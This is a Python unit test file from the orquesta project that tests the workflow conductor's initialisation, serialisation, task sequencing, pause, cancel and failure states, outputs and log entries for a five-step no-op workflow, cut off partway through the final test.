"Apache-2.0"
] | null | null | null | orquesta/tests/unit/conducting/test_workflow_conductor.py | batk0/orquesta | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from orquesta import conducting
from orquesta import events
from orquesta import exceptions as exc
from orquesta import graphing
from orquesta.specs import native as specs
from orquesta import states
from orquesta.tests.unit import base
from orquesta.utils import dictionary as dx
class WorkflowConductorTest(base.WorkflowConductorTest):
def _prep_conductor(self, context=None, inputs=None, state=None):
wf_def = """
version: 1.0
description: A basic sequential workflow.
input:
- a
- b: False
output:
- data:
a: <% ctx().a %>
b: <% ctx().b %>
c: <% ctx().c %>
tasks:
task1:
action: core.noop
next:
- when: <% succeeded() %>
publish:
- c: 'xyz'
do: task2
task2:
action: core.noop
next:
- when: <% succeeded() %>
do: task3
task3:
action: core.noop
next:
- when: <% succeeded() %>
do: task4
task4:
action: core.noop
next:
- when: <% succeeded() %>
do: task5
task5:
action: core.noop
"""
spec = specs.WorkflowSpec(wf_def)
kwargs = {
'context': context if context is not None else None,
'inputs': inputs if inputs is not None else None
}
conductor = conducting.WorkflowConductor(spec, **kwargs)
self.assertIsNone(conductor._graph)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertIsNone(conductor._flow)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
if state:
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
conductor.request_workflow_state(state)
self.assertEqual(conductor._workflow_state, state)
self.assertEqual(conductor.get_workflow_state(), state)
else:
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
user_inputs = inputs or {}
parent_context = context or {}
self.assertDictEqual(conductor._inputs, user_inputs)
self.assertDictEqual(conductor.get_workflow_input(), user_inputs)
self.assertDictEqual(conductor._parent_ctx, parent_context)
self.assertDictEqual(conductor.get_workflow_parent_context(), parent_context)
default_inputs = {'a': None, 'b': False}
init_ctx_value = dx.merge_dicts(default_inputs, user_inputs, True)
init_ctx_value = dx.merge_dicts(init_ctx_value, parent_context, True)
expected_ctx_entry = {'srcs': [], 'value': init_ctx_value}
self.assertDictEqual(conductor.get_workflow_initial_context(), expected_ctx_entry)
return conductor
def test_init(self):
conductor = self._prep_conductor()
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': {},
'input': {},
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': {'a': None, 'b': False}}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_init_with_inputs(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs)
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': {},
'input': inputs,
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': inputs}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_init_with_partial_inputs(self):
inputs = {'a': 123}
default_inputs = {'b': False}
expected_initial_ctx = dx.merge_dicts(inputs, default_inputs, True)
conductor = self._prep_conductor(inputs=inputs)
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': {},
'input': inputs,
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': expected_initial_ctx}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_init_with_context(self):
context = {'parent': {'ex_id': '12345'}}
inputs = {'a': 123, 'b': True}
init_ctx = dx.merge_dicts(copy.deepcopy(inputs), copy.deepcopy(context))
conductor = self._prep_conductor(context=context, inputs=inputs)
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': context,
'input': inputs,
'output': None,
'state': states.UNSET,
'errors': [],
'log': [],
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': init_ctx}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
def test_serialization(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
# Mock task flows.
for i in range(1, 6):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'state': conductor.get_workflow_state(),
'flow': conductor.flow.serialize(),
'context': conductor.get_workflow_parent_context(),
'input': conductor.get_workflow_input(),
'output': conductor.get_workflow_output(),
'errors': conductor.errors,
'log': conductor.log
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
self.assertEqual(len(conductor.flow.tasks), 5)
self.assertEqual(len(conductor.flow.sequence), 5)
def test_get_workflow_initial_context(self):
conductor = self._prep_conductor()
expected_ctx_entry = {'srcs': [], 'value': {'a': None, 'b': False}}
self.assertDictEqual(conductor.get_workflow_initial_context(), expected_ctx_entry)
def test_get_workflow_initial_context_with_inputs(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
expected_ctx_entry = {'srcs': [], 'value': inputs}
self.assertDictEqual(conductor.get_workflow_initial_context(), expected_ctx_entry)
def test_get_start_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
next_task_name = 'task1'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_value = {'a': 123, 'b': False}
expected_tasks = [self.format_task_item(next_task_name, expected_ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(), expected_tasks)
def test_get_start_tasks_when_graph_paused(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
conductor.request_workflow_state(states.PAUSING)
self.assertListEqual(conductor.get_next_tasks(), [])
conductor.request_workflow_state(states.PAUSED)
self.assertListEqual(conductor.get_next_tasks(), [])
def test_get_start_tasks_when_graph_canceled(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
conductor.request_workflow_state(states.CANCELING)
self.assertListEqual(conductor.get_next_tasks(), [])
conductor.request_workflow_state(states.CANCELED)
self.assertListEqual(conductor.get_next_tasks(), [])
def test_get_start_tasks_when_graph_abended(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
conductor.request_workflow_state(states.FAILED)
self.assertListEqual(conductor.get_next_tasks(), [])
def test_get_task(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
current_task = {'id': task_name, 'name': task_name}
expected_ctx = {'a': 123, 'b': False, '__current_task': current_task}
task = conductor.get_task(task_name)
self.assertEqual(task['id'], task_name)
self.assertEqual(task['name'], task_name)
self.assertDictEqual(task['ctx'], expected_ctx)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
task_name = 'task2'
current_task = {'id': task_name, 'name': task_name}
expected_ctx = {'a': 123, 'b': False, 'c': 'xyz', '__current_task': current_task}
task = conductor.get_task(task_name)
self.assertEqual(task['id'], task_name)
self.assertEqual(task['name'], task_name)
self.assertDictEqual(task['ctx'], expected_ctx)
def test_get_next_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
for i in range(1, 5):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
next_task_name = 'task' + str(i + 1)
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_val = {'a': 123, 'b': False, 'c': 'xyz'}
expected_task = self.format_task_item(next_task_name, expected_ctx_val, next_task_spec)
self.assert_task_list(conductor.get_next_tasks(task_name), [expected_task])
def test_get_next_tasks_repeat_with_no_input(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
self.assertEqual(len(conductor.get_next_tasks()), 1)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks()), 0)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
self.assertEqual(len(conductor.get_next_tasks()), 1)
conductor.update_task_flow('task2', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks()), 0)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
self.assertEqual(len(conductor.get_next_tasks()), 0)
def test_get_next_tasks_repeat_by_task_name(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
self.assertEqual(len(conductor.get_next_tasks()), 1)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks('task1')), 0)
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
next_tasks = conductor.get_next_tasks('task1')
self.assertEqual(len(next_tasks), 1)
self.assertEqual(next_tasks[0]['name'], 'task2')
conductor.update_task_flow('task2', events.ActionExecutionEvent(states.RUNNING))
self.assertEqual(len(conductor.get_next_tasks('task2')), 0)
def test_get_next_tasks_from_staged(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
next_task_name = 'task1'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_val = {'a': 123, 'b': False}
expected_task = self.format_task_item(next_task_name, expected_ctx_val, next_task_spec)
self.assert_task_list(conductor.get_next_tasks(), [expected_task])
for i in range(1, 5):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
next_task_name = 'task' + str(i + 1)
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
expected_ctx_val = {'a': 123, 'b': False, 'c': 'xyz'}
expected_task = self.format_task_item(next_task_name, expected_ctx_val, next_task_spec)
self.assert_task_list(conductor.get_next_tasks(), [expected_task])
def test_get_next_tasks_when_this_task_paused(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
task_name = 'task2'
next_task_name = 'task3'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.PAUSING))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.PAUSED))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
# After the previous task is paused, since there is no other tasks running,
# the workflow is paused. The workflow needs to be resumed manually.
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
conductor.request_workflow_state(states.RESUMING)
self.assertEqual(conductor.get_workflow_state(), states.RESUMING)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
def test_get_next_tasks_when_graph_paused(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
conductor.request_workflow_state(states.PAUSING)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.request_workflow_state(states.PAUSED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.request_workflow_state(states.RESUMING)
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
def test_get_next_tasks_when_this_task_canceled(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
task_name = 'task2'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.CANCELING))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.CANCELED))
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_next_tasks_when_graph_canceled(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
conductor.request_workflow_state(states.CANCELING)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
conductor.request_workflow_state(states.CANCELED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_next_tasks_when_this_task_abended(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
task_name = 'task2'
conductor.graph.update_transition('task2', 'task3', 0, criteria=['<% succeeded() %>'])
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.FAILED))
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_next_tasks_when_graph_abended(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
next_task_name = 'task2'
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
ctx_value = {'a': 123, 'b': False, 'c': 'xyz'}
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
expected_tasks = [self.format_task_item(next_task_name, ctx_value, next_task_spec)]
self.assert_task_list(conductor.get_next_tasks(task_name), expected_tasks)
conductor.request_workflow_state(states.FAILED)
self.assertListEqual(conductor.get_next_tasks(task_name), [])
def test_get_task_initial_context(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
task1_in_ctx = {'srcs': [], 'value': copy.deepcopy(inputs)}
self.assertDictEqual(conductor.get_task_initial_context(task_name), task1_in_ctx)
task2_in_ctx = {'srcs': [0], 'value': dx.merge_dicts(copy.deepcopy(inputs), {'c': 'xyz'})}
expected_context_list = [task1_in_ctx, task2_in_ctx]
self.assertListEqual(conductor.flow.contexts, expected_context_list)
def test_get_task_transition_contexts(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
# Use task1 to get context for task2 that is staged by not yet running.
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow('task1', events.ActionExecutionEvent(states.SUCCEEDED))
task2_in_ctx = {'srcs': [0], 'value': dx.merge_dicts(copy.deepcopy(inputs), {'c': 'xyz'})}
expected_contexts = {'task2__0': task2_in_ctx}
self.assertDictEqual(conductor.get_task_transition_contexts('task1'), expected_contexts)
# Use task1 to get context for task2 that is alstaged running.
conductor.update_task_flow('task2', events.ActionExecutionEvent(states.RUNNING))
task2_in_ctx = {'srcs': [0], 'value': dx.merge_dicts(copy.deepcopy(inputs), {'c': 'xyz'})}
expected_contexts = {'task2__0': task2_in_ctx}
self.assertDictEqual(conductor.get_task_transition_contexts('task1'), expected_contexts)
# Use task2 to get context for task3 that is not staged yet.
self.assertDictEqual(conductor.get_task_transition_contexts('task2'), {})
# Use task3 that is not yet staged to get context.
self.assertRaises(
exc.InvalidTaskFlowEntry,
conductor.get_task_transition_contexts,
'task3'
)
def test_get_workflow_terminal_context_when_workflow_incomplete(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
self.assertRaises(exc.WorkflowContextError, conductor.get_workflow_terminal_context)
def test_get_workflow_terminal_context_when_workflow_completed(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
for i in range(1, 6):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_ctx_value = {'a': 123, 'b': True, 'c': 'xyz'}
expected_ctx_entry = {'src': [4], 'term': True, 'value': expected_ctx_value}
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
self.assertDictEqual(conductor.get_workflow_terminal_context(), expected_ctx_entry)
def test_get_workflow_output_when_workflow_incomplete(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
for i in range(1, 5):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
self.assertIsNone(conductor.get_workflow_output())
def test_get_workflow_output_when_workflow_failed(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
for i in range(1, 5):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
task_name = 'task5'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.FAILED))
expected_output = {'data': {'a': 123, 'b': True, 'c': 'xyz'}}
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
self.assertDictEqual(conductor.get_workflow_output(), expected_output)
def test_get_workflow_output_when_workflow_succeeded(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
for i in range(1, 6):
task_name = 'task' + str(i)
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
expected_output = {'data': {'a': 123, 'b': True, 'c': 'xyz'}}
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
self.assertDictEqual(conductor.get_workflow_output(), expected_output)
def test_set_workflow_canceling_when_no_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
conductor.request_workflow_state(states.CANCELING)
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_set_workflow_canceled_when_no_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
conductor.request_workflow_state(states.CANCELED)
self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_set_workflow_canceling_when_has_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.request_workflow_state(states.CANCELING)
self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
def test_set_workflow_canceled_when_has_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.request_workflow_state(states.CANCELED)
self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
def test_set_workflow_pausing_when_no_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
conductor.request_workflow_state(states.PAUSING)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_set_workflow_paused_when_no_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.SUCCEEDED))
conductor.request_workflow_state(states.PAUSED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_set_workflow_pausing_when_has_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.request_workflow_state(states.PAUSING)
self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
def test_set_workflow_paused_when_has_active_tasks(self):
inputs = {'a': 123}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
task_name = 'task1'
conductor.update_task_flow(task_name, events.ActionExecutionEvent(states.RUNNING))
conductor.request_workflow_state(states.PAUSED)
self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
def test_append_log_entries(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
extra = {'x': 1234}
conductor.log_entry('info', 'The workflow is running as expected.', data=extra)
conductor.log_entry('warn', 'The task may be running a little bit slow.', task_id='task1')
conductor.log_entry('error', 'This is baloney.', task_id='task1')
conductor.log_error(TypeError('Something is not right.'), task_id='task1')
conductor.log_errors([KeyError('task1'), ValueError('foobar')], task_id='task1')
self.assertRaises(
exc.WorkflowLogEntryError,
conductor.log_entry,
'foobar',
'This is foobar.'
)
expected_log_entries = [
{
'type': 'info',
'message': 'The workflow is running as expected.',
'data': extra
},
{
'type': 'warn',
'message': 'The task may be running a little bit slow.',
'task_id': 'task1'
}
]
expected_errors = [
{
'type': 'error',
'message': 'This is baloney.',
'task_id': 'task1'
},
{
'type': 'error',
'message': 'TypeError: Something is not right.',
'task_id': 'task1'
},
{
'type': 'error',
'message': "KeyError: 'task1'",
'task_id': 'task1'
},
{
'type': 'error',
'message': 'ValueError: foobar',
'task_id': 'task1'
}
]
self.assertListEqual(conductor.log, expected_log_entries)
self.assertListEqual(conductor.errors, expected_errors)
# Serialize and check.
data = conductor.serialize()
expected_data = {
'spec': conductor.spec.serialize(),
'graph': conductor.graph.serialize(),
'context': {},
'input': inputs,
'output': None,
'state': states.RUNNING,
'errors': expected_errors,
'log': expected_log_entries,
'flow': {
'staged': {'task1': {'ctxs': [0], 'ready': True}},
'tasks': {},
'sequence': [],
'contexts': [{'srcs': [], 'value': inputs}]
}
}
self.assertDictEqual(data, expected_data)
# Deserialize and check.
conductor = conducting.WorkflowConductor.deserialize(data)
self.assertIsInstance(conductor.spec, specs.WorkflowSpec)
self.assertEqual(conductor.get_workflow_state(), states.RUNNING)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertEqual(len(conductor.graph._graph.node), 5)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
self.assertListEqual(conductor.log, expected_log_entries)
self.assertListEqual(conductor.errors, expected_errors)
def test_append_duplicate_log_entries(self):
inputs = {'a': 123, 'b': True}
conductor = self._prep_conductor(inputs=inputs, state=states.RUNNING)
extra = {'x': 1234}
conductor.log_entry('info', 'The workflow is running as expected.', data=extra)
conductor.log_entry('info', 'The workflow is running as expected.', data=extra)
conductor.log_entry('warn', 'The task may be running a little bit slow.', task_id='task1')
conductor.log_entry('warn', 'The task may be running a little bit slow.', task_id='task1')
conductor.log_entry('error', 'This is baloney.', task_id='task1')
conductor.log_entry('error', 'This is baloney.', task_id='task1')
conductor.log_error(TypeError('Something is not right.'), task_id='task1')
conductor.log_error(TypeError('Something is not right.'), task_id='task1')
conductor.log_errors([KeyError('task1'), ValueError('foobar')], task_id='task1')
conductor.log_errors([KeyError('task1'), ValueError('foobar')], task_id='task1')
expected_log_entries = [
{
'type': 'info',
'message': 'The workflow is running as expected.',
'data': extra
},
{
'type': 'warn',
'message': 'The task may be running a little bit slow.',
'task_id': 'task1'
}
]
expected_errors = [
{
'type': 'error',
'message': 'This is baloney.',
'task_id': 'task1'
},
{
'type': 'error',
'message': 'TypeError: Something is not right.',
'task_id': 'task1'
},
{
'type': 'error',
'message': "KeyError: 'task1'",
'task_id': 'task1'
},
{
'type': 'error',
'message': 'ValueError: foobar',
